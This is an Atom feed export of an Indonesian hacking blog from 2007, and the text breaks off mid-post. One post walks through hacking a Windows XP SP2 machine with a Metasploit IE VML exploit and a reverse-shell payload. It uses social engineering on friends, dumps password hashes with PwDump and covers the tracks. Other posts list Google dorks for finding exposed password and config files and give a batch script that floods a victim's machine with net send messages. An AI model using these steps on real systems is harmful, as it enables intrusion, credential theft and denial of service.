/&gt;&lt;br /&gt;It is basically a user level front-end providing the user with various control options like remote target selection, offset selection, verbosity, debugging and other options. This forms majority of the exploit code and makes the code quite bulky.&lt;br /&gt;&lt;br /&gt;Network connection Handler&lt;br /&gt;&lt;br /&gt;This comprises of the various routines which handle network connections like name resolution, socket establishment, error handling etc.&lt;br /&gt;&lt;br /&gt;As we can see there is a lot of unnecessary and repetitive code which makes the exploit really bulky and error prone.&lt;br /&gt;&lt;br /&gt;In the course of development, many problems are faced which hinder the exploit development process. The mad race of people trying to release the exploit first leads to a lot of bad and unnecessarily complicated code.&lt;br /&gt;&lt;br /&gt;Some exploits need an understanding of deeper concepts and research, such as exploits based on network protocols (RPC, SMB and SSL) and obfuscated APIs. Also, not much information is revealed in the advisory so there is always the need for experimentation.&lt;br /&gt;&lt;br /&gt;Finding target values is also one big headache which involves lot of trial and error.&lt;br /&gt;&lt;br /&gt;Finally, most payloads are hard coded and any changes breaks the exploit.&lt;br /&gt;&lt;br /&gt;Many firewalls and IPSes detect and block shellcode.&lt;br /&gt;&lt;br /&gt;Time is of primary concern, and some exploits consume quite a lot of time and concentration, both of which are the precious assets of a security researcher.&lt;br /&gt;&lt;br /&gt;All said and done, coding exploit is one hell of a messy job!&lt;br /&gt;&lt;br /&gt;gmn.. ngerti ga?? ga mudheng ya… sama dong! ;p&lt;br /&gt;&lt;br /&gt;ah… ini mah kebanyakan teorinya, mana!!.. mana prakteknya?!&lt;br /&gt;&lt;br /&gt;sabar, orang sabar pantatnya lebar ;p kenapa saya posting artikel itu? soalnya biar kita ngerti, minimal tahu lah apa yang kita pakai (exploit). Tidak semua exploit yang kita peroleh diinternet itu aman, kadang-kadang malah ada backdoornya. Jadi lebih baik, klo pakai exploit lihat2 source codenya juga. yah pura2 aja ngerti, biar keliatan keren!&lt;br /&gt;&lt;br /&gt;Belajar Hack (3) - Hack Windows XP SP2&lt;br /&gt;14 11 2006&lt;br /&gt;&lt;br /&gt;*Fyuhh… akhirnya sempet juga nyelesain tulisan ini. Yosh.. here is the prof of concept!.&lt;br /&gt;&lt;br /&gt;Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.&lt;br /&gt;&lt;br /&gt;Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.&lt;br /&gt;&lt;br /&gt;Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?&lt;br /&gt;&lt;br /&gt;    The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.&lt;br /&gt;&lt;br /&gt;Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.&lt;br /&gt;&lt;br /&gt;Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!&lt;br /&gt;&lt;br /&gt;Pertama2 jalankan ‘mfsconsole’!&lt;br /&gt;&lt;br /&gt;main1.JPG&lt;br /&gt;&lt;br /&gt;Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.&lt;br /&gt;&lt;br /&gt;Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.&lt;br /&gt;&lt;br /&gt;    This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.&lt;br /&gt;&lt;br /&gt;Untuk melihat info dari exploit ini gunakan perintah :&lt;br /&gt;&lt;br /&gt;    msf &gt; info ie_vml_rectfill&lt;br /&gt;&lt;br /&gt;Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Untuk menggunakan exploit gunakan perintah2 berikut dalam console :&lt;br /&gt;&lt;br /&gt;    msf &gt; use_ie_vml_rectfill&lt;br /&gt;&lt;br /&gt;    msf &gt; set PAYLOAD win32_reverse&lt;br /&gt;&lt;br /&gt;    msf &gt; set RHOST ip_target&lt;br /&gt;&lt;br /&gt;    msf &gt; set LHOST ip_penyerang&lt;br /&gt;&lt;br /&gt;    msf &gt; exploit&lt;br /&gt;&lt;br /&gt;Hasilnya akan tampak seperti gambar berikut :&lt;br /&gt;&lt;br /&gt;exploit1.JPG&lt;br /&gt;&lt;br /&gt;Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D&lt;br /&gt;&lt;br /&gt;Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Crack da Password!&lt;br /&gt;&lt;br /&gt;Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!&lt;br /&gt;&lt;br /&gt;Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :&lt;br /&gt;&lt;br /&gt;pwdump.JPG&lt;br /&gt;&lt;br /&gt;Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah&lt;br /&gt;&lt;br /&gt;    C:\temp\Pwdump –o pass.txt 127.0.0.1&lt;br /&gt;&lt;br /&gt;Klo berhasil akan tampak pada gambar berikut.&lt;br /&gt;&lt;br /&gt; dump1.JPG&lt;br /&gt;&lt;br /&gt; Lalu copy file pass.txt ke komputer kita&lt;br /&gt;&lt;br /&gt;    C:\temp\copy pass.txt z:&lt;br /&gt;&lt;br /&gt;Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.&lt;br /&gt;&lt;br /&gt;clean.JPG&lt;br /&gt;&lt;br /&gt;Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).&lt;br /&gt;&lt;br /&gt;Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.&lt;br /&gt;&lt;br /&gt;Happy Hacking…..&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Beberapa saran agar windows kita tetap aman terhadap exploit diatas.&lt;br /&gt;&lt;br /&gt;1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.&lt;br /&gt;&lt;br /&gt;2. Patch Windows anda.&lt;br /&gt;&lt;br /&gt;3. Gunakan antivirus dengan update terbaru&lt;br /&gt;&lt;br /&gt;4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Reference :&lt;br /&gt;&lt;br /&gt;http://www.metasploit.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-1509560661531509329?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/1509560661531509329'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/1509560661531509329'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/belajar-hack.html' title='Belajar Hack'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-7656498067370667437</id><published>2007-09-24T20:20:00.000+07:00</published><updated>2007-09-24T20:22:21.572+07:00</updated><title type='text'>Googling Hack</title><content type='html'>Googling hack&lt;br /&gt;\” Intitle:\” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang&lt;br /&gt;dimaksud. Sebagai contoh pada pencarian, ?intitle:&lt;br /&gt;password admin ? ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata ? password ? sebagai judulnya dengan prioritas utama ?admin? .&lt;br /&gt;Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian ?allintitle:admin mdb?. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu ?admin? dan ?mdb?.&lt;br /&gt;&lt;br /&gt;? inurl:? ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,?inurl : database mdb?. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang ?database mdb ?.&lt;br /&gt;Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks ?allinurl:? untuk mendapatkan list url tersebut.&lt;br /&gt;Sebagai contoh pencarian ?allinurl: etc/passwd? , pencarian akan menghasilkan URL yang mengandung informasi tentang ?etc? dan ?passwd?. Tanda garis miring slash (?/?) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.&lt;br /&gt;&lt;br /&gt;?site:? ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: ?waveguide site:itb.ac.id? (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.&lt;br /&gt;&lt;br /&gt;?cache:? akan menunjukkan daftar web yang telah masuk kedalam indeks database Google. Sebagai contoh:&lt;br /&gt;?cache:deffcon.org?, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org&lt;br /&gt;&lt;br /&gt;?filetype:? ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : ?filetype:doc site:go.id confidental? ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi ?.doc? pada semua domain go.id yang berisi informasi ?confidential?.&lt;br /&gt;&lt;br /&gt;?link:? ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:?link:www.securityfocus.com? akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.&lt;br /&gt;&lt;br /&gt;?related:? sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.&lt;br /&gt;Sebagai contoh: ?related:www.securityfocus.com?, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.&lt;br /&gt;&lt;br /&gt;?intext:? sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :&lt;br /&gt;?intext:admin? (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.&lt;br /&gt;&lt;br /&gt;Beberapa query sintaks diatas akan sangat membantu dalam pencarian data dan informasi lebih detail.&lt;br /&gt;Google dapat menjadi mesin pencari untuk menggali informasi tertentu dan rahasia, informasi yang tidak diperkirakan yang dapat memberitahukan sisi lemah suatu sistem. Hal tersebut yang dimanfaatkan oleh sebagian individu untuk melakukan penetrasi suatu server atau sistem informasi .&lt;br /&gt;&lt;br /&gt;Sintaks ?Index of ? dapat digunakan untuk mendapatkan situs yang menampilkan indeks browsing direktori.&lt;br /&gt;Webserver dengan indeks browsing yang dapat diakses, berarti siapa saja dapat melakukan akses pada direktori webserver, seperti layaknya dapat dilakukan pada lokal direktori pada umumnya.&lt;br /&gt;Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks ?index of? untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya.&lt;br /&gt;Dibawah ini merupakan beberapa contoh penggunaan sintaks ? indeks of? untuk mendapatkan informasi yang penting dan sensitive sifatnya.&lt;br /&gt;ex :&lt;br /&gt;Index of /admin&lt;br /&gt;Index of /passwd&lt;br /&gt;Index of /password&lt;br /&gt;Index of /mail&lt;br /&gt;\”Index of /\” +passwd&lt;br /&gt;\”Index of /\” +password.txt&lt;br /&gt;\”Index of /\” +.htaccess&lt;br /&gt;\”Index of /secret\”&lt;br /&gt;\”Index of /confidential\”&lt;br /&gt;\”Index of /root\”&lt;br /&gt;\”Index of /cgi-bin\”&lt;br /&gt;\”Index of /credit-card\”&lt;br /&gt;\”Index of /logs\”&lt;br /&gt;\”Index of /config\”&lt;br /&gt;\”Index of/admin.asp&lt;br /&gt;\”Index of/login.asp&lt;br /&gt;&lt;br /&gt;Mencari sistem atau server yang vulnerable menggunakan sintaks ?inurl:? atau ?allinurl:?&lt;br /&gt;&lt;br /&gt;1. Menggunakan sintaks ?allinurl:winnt/system32/? (dengan tanda petik ) akan menampilkan daftar semua link pada server yang memberikan akses pada direktori yang terlarang seperti ?system32?. Terkadang akan didapat akses pada cmd.exe pada direktori ?system32? yang memungkinkan seseorang untuk mengambil alih kendali sistem pada server tersebut.&lt;br /&gt;&lt;br /&gt;2. Menggunakan ?allinurl:wwwboard/passwd.txt? ( dengan tanda petik ) akan menampilkan daftar semua link pada server yang memiliki kelemahan pada ?wwwboard Password?. Pembahasan lebih lanjut tentang vulnerability ?wwwboard Password? dapat dilihat pada site keamanan jaringan seperti http://www.securityfocus.com atau http://www.securitytracker.com&lt;br /&gt;&lt;br /&gt;3. Menggunakan sintaks ?inurl: bash history? (dengan tanda petik ) akan menampilkan daftar link pada server yang memberikan akses pada file ?bash history? melalui web. File tersebut merupakan command history file yang mengandung daftar perintah yang dieksekusi oleh administrator, yang terkadang menyangkut informasi sensitive seperti password sistem. Seringkali password pada sistem telah dienkripsi, untuk mendapatkan password aslinya bentuk yang dienkripsi ini harus didekripsi menggunakan program password cracker. Lama waktu untuk mendapatkan hasil dekripsi tergantung dari keandalan program dan banyaknya karakter yang terenkripsi.&lt;br /&gt;&lt;br /&gt;4. Menggunakan ?inurl:config.txt? (dengan tanda petik) akan menampilkan daftar semua link pada server yang memberikan akses pada file ?config.txt. File ini berisi informasi penting termasuk hash value dari password administrator dan proses autentifikasi dari suatu database.&lt;br /&gt;&lt;br /&gt;Sintaks ?inurl:? atau ?allinurl:? dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :&lt;br /&gt;&lt;br /&gt;Inurl: /cgi-bin/cart32.exe&lt;br /&gt;inurl:admin filetype:txt&lt;br /&gt;inurl:admin filetype:db&lt;br /&gt;inurl:admin filetype:cfg&lt;br /&gt;inurl:mysql filetype:cfg&lt;br /&gt;inurl:passwd filetype:txt&lt;br /&gt;inurl:iisadmin&lt;br /&gt;inurl:auth_user_file.txt&lt;br /&gt;inurl:orders.txt&lt;br /&gt;inurl:\”wwwroot/*.\”&lt;br /&gt;inurl:adpassword.txt&lt;br /&gt;inurl:webeditor.php&lt;br /&gt;inurl:file_upload.php&lt;br /&gt;inurl:gov filetype:xls \”restricted\”&lt;br /&gt;index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php&lt;br /&gt;allinurl:/phpinfo.php&lt;br /&gt;allinurl:/privmsg.php&lt;br /&gt;allinurl:/privmsg.php&lt;br /&gt;inurl:cgi-bin/go.cgi?go=*&lt;br /&gt;allinurl:.cgi?page=*.txt&lt;br /&gt;allinurul:/modules/My_eGallery&lt;br /&gt;Mencari suatu sistem atau server yang memiliki kelemahan dengan sintaks ?intitle:?&lt;br /&gt;atau ?allintitle:?&lt;br /&gt;&lt;br /&gt;1. Menggunakan allintitle: \”index of /root? ( tanpa tanda kutip ) akan menampilkan&lt;br /&gt;Daftar link pada webserver yang memberikan akses pada direktori yang terlarang seperti direktori root.&lt;br /&gt;&lt;br /&gt;2. Menggunakan allintitle: \”index of /admin? ( tanpa tanda kutip ) akan menampilkan link pada site yang memiliki indeks browsing yang dapat diakses untuk direktori terlarang seperti direktori ?admin?.&lt;br /&gt;&lt;br /&gt;Penggunaan lain dari sintaks ?intitle:? atau ?allintitle:? yang dikombinasikan dengan sintaks lainnya antara lain :&lt;br /&gt;&lt;br /&gt;intitle:\”Index of\” .sh_history&lt;br /&gt;intitle:\”Index of\” .bash_history&lt;br /&gt;intitle:\”index of\” passwd&lt;br /&gt;intitle:\”index of\” people.lst&lt;br /&gt;intitle:\”index of\” pwd.db&lt;br /&gt;intitle:\”index of\” etc/shadow&lt;br /&gt;intitle:\”index of\” spwd&lt;br /&gt;intitle:\”index of\” master.passwd&lt;br /&gt;intitle:\”index of\” htpasswd&lt;br /&gt;intitle:\”index of\” members OR accounts&lt;br /&gt;intitle:\”index of\” user_carts OR user_cart&lt;br /&gt;allintitle: sensitive filetype:doc&lt;br /&gt;allintitle: restricted filetype :mail&lt;br /&gt;allintitle: restricted filetype:doc site:gov&lt;br /&gt;allintitle:*.php?filename=*&lt;br /&gt;allintitle:*.php?page=*&lt;br /&gt;allintitle:*.php?logon=*&lt;br /&gt;&lt;br /&gt;Penggunaan dan kombinasi pada sintaks tidak hanya terbatas pada contoh paparan diatas. Masih banyak lagi kombinasi dari sintaks sintaks dengan berbagai kata kunci yang dapat digunakan. Hal tersebut bergantung pada kreativitas dan kemauan untuk mencoba. Ada baiknya penggunaan wacana yang telah dipaparkan ini digunakan untuk kepentingan yang tidak menimbulkan kerugian atau kerusakan.&lt;br /&gt;Kelemahan pada suatu sistem atau server yang diketahui ada baiknya dilakukan sharing dengan administrator sistem yang bersangkutan sehingga dapat bermanfaat bagi semua pihak. Dikarenakan kemungkinan besar hasil dari pencarian informasi dapat memberikan informasi yang sensitive, yang seringkali menyangkut segi keamanan suatu sistem atau server.&lt;br /&gt;Wacana tentang sintaks yang sangat membantu dalam pencarian informasi tersebut akhirnya tergantung pada niat dan tujuan dalam pencarian data. Apakah sungguh sungguh dilakukan untuk kebutuhan pencarian data, mengumpulkan informasi dari suatu mesin target penetrasi. Tujuan akhirnya bergantung pada niat individu yang bersangkutan sehingga penulis tidak bertanggung jawab terhadap penyalahgunaan dari informasi yang telah dipaparkan. Seperti kata pepatah lama ? resiko ditanggung penumpang ?.&lt;br /&gt;&lt;br /&gt;This entry was posted on Saturday, June 2nd, 2007 at 3:01 pm and is filed under Hacking, Security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-7656498067370667437?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/7656498067370667437'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/7656498067370667437'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/googling-hack.html' title='Googling Hack'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-8869141541613998540</id><published>2007-09-20T03:04:00.000+07:00</published><updated>2007-09-20T03:07:40.895+07:00</updated><title type='text'>Tutorial Melakukan Flooding Jaringan</title><content type='html'>Mungkin ada yang ingin bertanya, “bagaimana seh caranya flooding ke komputer lain dalam satu network?” dan mungkin akan ada juga pertanyaan “kenapa anda ingin melalukan flooding ke komputer lain dalam 1 network?”.&lt;br /&gt;&lt;br /&gt;Nah, alasannya ada beragam. Bisa karena kesal dengan calon korban, bisa karena sekedar iseng, bisa karena ingin nambah ilmu aja, ato alasan apa aja. Tapi untuk jawaban yang pertama, akan saya beri sedikit turorial berupa scriptnya.&lt;br /&gt;&lt;br /&gt;OK..!!! ikuti langkah2 berikut ini :&lt;br /&gt;&lt;br /&gt;   1. Run command prompt/cmd anda, caranya klik start &gt; run &gt; cmd&lt;br /&gt;   2. Saat command prompt anda muncul, ketik edit hi.bat&lt;br /&gt;   3. Maka tampilan command prompt anda akan berbeda. setelah itu masukkan/ketikkan code di bawah ini :&lt;br /&gt;&lt;br /&gt;net send [ipkomputer]/[namakomputer] hi&lt;br /&gt;call hi.bat&lt;br /&gt;&lt;br /&gt;kemudian save as file tersebut.&lt;br /&gt;&lt;br /&gt;Saat ingin melakukan flooding, tingal klik 2 kali file batch tersebut…&lt;br /&gt;&lt;br /&gt;Ket :&lt;br /&gt;&lt;br /&gt;    * hi.bat bisa pada langkah 2 bisa diganti dangan nama apa saja, asal tidak spasi dan harus berekstensi .bat dan jangan lupa juga mengganti hi.bat pada code dengan nama yang sama pada langkah 2.&lt;br /&gt;    * jika ga tau nama komputer yang terhubung di jaringan, run cmd, lalu ketik “net view” (tanpa tanda petik2) dan juga saat dimasukkan tanpa tanda [ dan ]. Ingat juga, pilih antara ip ato nama komputer.&lt;br /&gt;    * cara ini hanya bisa dilakukan jika service messenger pada windows anda dan komputer tujuan di aktifkan&lt;br /&gt;    * yang terakhir..!!!! flooding ini akan mengirim pesan “hi” (bisa diganti) berulang-ulang hingga komputer tujuan hang. jadi gunakan dengan bijak.&lt;br /&gt;&lt;br /&gt;Sekian…Cape Dechhhh&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-8869141541613998540?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/8869141541613998540'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/8869141541613998540'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/tutorial-melakukan-flooding-jaringan.html' title='Tutorial Melakukan Flooding Jaringan'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-4818679612054010745</id><published>2007-09-16T11:09:00.000+07:00</published><updated>2007-09-16T11:13:26.573+07:00</updated><title type='text'>Google Hacking</title><content type='html'>Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada&lt;br /&gt;Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan&lt;br /&gt;defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari&lt;br /&gt;ribuan website tampilan utamanya berubah.&lt;br /&gt;&lt;br /&gt;Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik&lt;br /&gt;dengan menggunakan Google. Pada bagian akhir juga terdapat trik-trik dan&lt;br /&gt;keyword yang sering digunakan untuk melakukan pencarian file dan juga&lt;br /&gt;bagaimana mencari target dengan memanfaatkan Google.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 01 // Penggunaan Dasar -----------------------------------------------&lt;br /&gt;&lt;br /&gt;- Google tidak "case sensitive".&lt;br /&gt;Keyword: linux = LINUX = LiNuX&lt;br /&gt;Akan menghasilkan hal yang sama&lt;br /&gt;&lt;br /&gt;- AND: Secara Default Google menggunakan keyword and.&lt;br /&gt;Keyword: menjadi hacker&lt;br /&gt;Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker"&lt;br /&gt;&lt;br /&gt;- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah&lt;br /&gt;satu dari keyword. Note: OR dituliskan dengan huruf besar semua.&lt;br /&gt;Keyword: hacker OR c**c*er&lt;br /&gt;Hasilnya pencarian akan mengandung kata "hacker" atau "c**c*er"&lt;br /&gt;&lt;br /&gt;- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti&lt;br /&gt;"how" dan "where". Jika kata-kata umum ini begitu penting, anda&lt;br /&gt;bisa menambahkan "+" didepan keyword tersebut.&lt;br /&gt;Keyword: hacker how ==&gt; Kata "how" akan diabaikan&lt;br /&gt;Keyword: hacker +how ==&gt; Kata "how" akan diikutsertakan&lt;br /&gt;&lt;br /&gt;- -: Tanda minus "-" bisa digunakan untuk mengecualikan kata-kata&lt;br /&gt;tertentu dalam pencarian. Misal kita ingin mencari kata&lt;br /&gt;"linus tanpa linux", kita bisa menggunakan "linus -linux"&lt;br /&gt;&lt;br /&gt;- *: Google tidak mendukung pencarian * sebagai pengganti huruf.&lt;br /&gt;Misalkan kita ingin mencari dengan kata depan menja*&lt;br /&gt;Google tidak mencari kata "menjamu", "menjadi", "menjalar", dll&lt;br /&gt;Google akan menghasilkan pencarian hanya yang mengandung kata&lt;br /&gt;"menja".&lt;br /&gt;&lt;br /&gt;Tetapi google mendukung penggunaan * dalam pencarian kalimat.&lt;br /&gt;Keyword: "menjadi * hacker"&lt;br /&gt;Hasilnya pencarian dapat menghasilkan "menjadi seorang hacker",&lt;br /&gt;"menjadi white hacker", dll.&lt;br /&gt;&lt;br /&gt;- "": Dapat digunakan untuk mencari kata yg lengkap.&lt;br /&gt;Keyword: "menjadi hacker"&lt;br /&gt;Hasilnya pencarian akan mengandung kata "menjadi hacker"&lt;br /&gt;&lt;br /&gt;- ?: Dapat digunakan untuk mencari pada direktori Google&lt;br /&gt;Keyword: ?intitle:index.of? mp3&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 02 // Operator Spesial -----------------------------------------------&lt;br /&gt;&lt;br /&gt;-- Contoh hasil pencarian --&lt;br /&gt;&lt;br /&gt;Google --&gt; Judul&lt;br /&gt;... Language Tools. Ways to help with tsunami relief \&lt;br /&gt;Advertising Programs - About Google ©2005 Google - &gt; Deskripsi&lt;br /&gt;Searching 8,058,044,651 web pages. /&lt;br /&gt;www.google.com/ - 3k - 5 Jan 2005 --&gt; URL&lt;br /&gt;&lt;br /&gt;-- Contoh hasil pencarian --&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- intitle: Untuk mencari kata-kata dari judul suatu halaman web.&lt;br /&gt;Keyword: 